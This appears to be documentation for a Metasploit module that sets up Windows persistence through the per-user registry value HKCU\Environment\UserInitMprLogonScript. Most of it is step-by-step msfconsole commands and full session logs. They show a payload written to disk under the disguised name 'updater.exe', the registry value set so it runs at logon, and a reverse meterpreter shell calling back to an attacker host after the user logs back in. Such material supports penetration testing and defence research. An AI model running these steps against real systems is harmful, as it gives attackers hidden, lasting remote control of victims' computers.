## Vulnerable Application ### Windows Persistence via HKCU UserInitMprLogonScript This module establishes persistence by leveraging the per-user registry value: HKCU\Environment\UserInitMprLogonScript The module writes a payload executable to disk and sets the `UserInitMprLogonScript` value so that the payload executes when the user logs in. Unlike the traditional `Winlogon\Userinit` (HKLM) technique, this method: * Does not require administrative privileges * Does not modify system-wide registry keys * Only affects the current user * Executes during interactive user logon The payload will execute when the user signs out and logs back in. ## Verification Steps 1. Start `msfconsole` 2. Obtain a meterpreter session on a Windows target (user-level is sufficient) 3. `use exploit/windows/persistence/userinit_mpr_logon_script` 4. `set SESSION ` 5. `set LHOST ` 6. `set LPORT ` 7. `run` 8. Sign out from the Windows session 9. Log back in 10. A new meterpreter session should be created ## Options ### SESSION (Required) The session to run this module on. ### LHOST (Required) The local host to receive the reverse connection. ### LPORT (Required) The local port to receive the reverse connection. ### PAYLOAD_NAME The filename to use when writing the payload to disk. If not specified, a random filename will be generated. ## Scenarios ### Initial Session ``` msf > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https payload => windows/x64/meterpreter/reverse_https msf exploit(multi/handler) > set LHOST 172.21.176.212 LHOST => 172.21.176.212 msf exploit(multi/handler) > set LPORT 4444 LPORT => 4444 msf exploit(multi/handler) > run [*] Started HTTPS reverse handler on https://172.21.176.212:4444 [!] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: 7shkdu86) Without a database connected that payload UUID tracking will not work! [*] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: 7shkdu86) Staging x64 payload (233052 bytes) ... [!] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: 7shkdu86) Without a database connected that payload UUID tracking will not work! [*] Meterpreter session 1 opened (172.21.176.212:4444 -> 172.21.176.1:62359) at 2026-03-01 05:45:19 +0200 meterpreter > background [*] Backgrounding session 1... msf exploit(multi/handler) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x64/win NERO\DELL @ NERO 172.21.176.212:4444 -> dows 172.21.176.1:62359 (172 .21.176.1) ``` ### Install Persistence ``` msf exploit(multi/handler) > use exploit/windows/persistence/userinit_mpr_logon_script [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf exploit(windows/persistence/userinit_mpr_logon_script) > set SESSION 1 SESSION => 1 msf exploit(windows/persistence/userinit_mpr_logon_script) > set LHOST 172.21.176.212 LHOST => 172.21.176.212 msf exploit(windows/persistence/userinit_mpr_logon_script) > set LPORT 4444 LPORT => 4444 msf exploit(windows/persistence/userinit_mpr_logon_script) > set PAYLOAD_NAME updater PAYLOAD_NAME => updater msf exploit(windows/persistence/userinit_mpr_logon_script) > set WRITABLEDIR C:\\Users\\DELL\\AppData\\Roaming WRITABLEDIR => C:\Users\DELL\AppData\Roaming msf exploit(windows/persistence/userinit_mpr_logon_script) > set CleanUpRc true CleanUpRc => true msf exploit(windows/persistence/userinit_mpr_logon_script) > set VERBOSE true VERBOSE => true msf exploit(windows/persistence/userinit_mpr_logon_script) > check [+] The target is vulnerable. Registry path is writable msf exploit(windows/persistence/userinit_mpr_logon_script) > run [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. msf exploit(windows/persistence/userinit_mpr_logon_script) > [-] Handler failed to bind to 172.21.176.212:4444:- - [-] Handler failed to bind to 0.0.0.0:4444:- - [*] Running automatic check ("set AutoCheck false" to disable) [+] The target is vulnerable. Registry path is writable [+] Writing payload to C:\Users\DELL\AppData\Roaming\updater.exe [+] Configured HKCU\Environment\UserInitMprLogonScript to execute C:\Users\DELL\AppData\Roaming\updater.exe [*] Meterpreter-compatible Cleanup RC file: /home/nayera/.msf4/logs/persistence/NERO_20260301.4724/NERO_20260301.4724.rc jobs Jobs ==== Id Name Payload Payload opts -- ---- ------- ------------ 0 Exploit: windows/pers windows/meterpreter/r tcp://172.21.176.212:4 istence/userinit_mpr_ everse_tcp 444 (setting up) logon_script msf exploit(windows/persistence/userinit_mpr_logon_script) > jobs Jobs ==== Id Name Payload Payload opts -- ---- ------- ------------ 0 Exploit: windows/pers windows/meterpreter/r tcp://172.21.176.212:4 istence/userinit_mpr_ everse_tcp 444 (setting up) logon_script msf exploit(windows/persistence/userinit_mpr_logon_script) > jobs -K Stopping all jobs... msf exploit(windows/persistence/userinit_mpr_logon_script) > jobs Jobs ==== No active jobs. msf exploit(windows/persistence/userinit_mpr_logon_script) > use exploit/multi/handler [*] Using configured payload windows/x64/meterpreter/reverse_https msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https payload => windows/x64/meterpreter/reverse_https msf exploit(multi/handler) > set LHOST 172.21.176.212 LHOST => 172.21.176.212 msf exploit(multi/handler) > set LPORT 4444 LPORT => 4444 msf exploit(multi/handler) > run -j [*] Exploit running as background job 1. [*] Exploit completed, but no session was created. msf exploit(multi/handler) > [*] Started HTTPS reverse handler on https://172.21.176.212:4444 msf exploit(multi/handler) > jobs Jobs ==== Id Name Payload Payload opts -- ---- ------- ------------ 1 Exploit: multi/handle windows/x64/meterpret https://172.21.176.212 r er/reverse_https :4444 msf exploit(multi/handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid Server username: NERO\DELL meterpreter > sysinfo Computer : NERO OS : Windows 11 24H2+ (10.0 Build 26200). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows meterpreter > reg queryval -k HKCU\\Environment -v UserInitMprLogonScript Key: HKCU\Environment Name: UserInitMprLogonScript Type: REG_SZ Data: C:\Users\DELL\AppData\Roaming\updater.exe meterpreter > reg setval -k HKCU\\Environment -v testvalue -d test Successfully set testvalue of REG_SZ. meterpreter > reg deleteval -k HKCU\\Environment -v testvalue Successfully deleted testvalue. meterpreter > ls C:\\Users\\DELL\\AppData\\Roaming\\updater.exe 100777/rwxrwxrwx 7168 fil 2026-03-01 05:47:24 +0200 C:\Users\DELL\AppData\Roaming\updater.exe meterpreter > background [*] Backgrounding session 1... msf exploit(multi/handler) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x64/win NERO\DELL @ NERO 172.21.176.212:4444 -> dows 172.21.176.1:62359 (172 .21.176.1) msf exploit(multi/handler) > sessions -K [*] Killing all sessions... [*] 172.21.176.1 - Meterpreter session 1 closed. msf exploit(multi/handler) > sessions Active sessions =============== No active sessions. msf exploit(multi/handler) > ``` ### Logout, and log back in ``` msf exploit(multi/handler) > [!] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: bodrq2fe) Without a database connected that payload UUID tracking will not work! [*] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: bodrq2fe) Attaching orphaned/stageless session... [!] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: bodrq2fe) Without a database connected that payload UUID tracking will not work! [*] Meterpreter session 2 opened (172.21.176.212:4444 -> 172.21.176.1:65263) at 2026-02-28 07:58:07 +0200 ```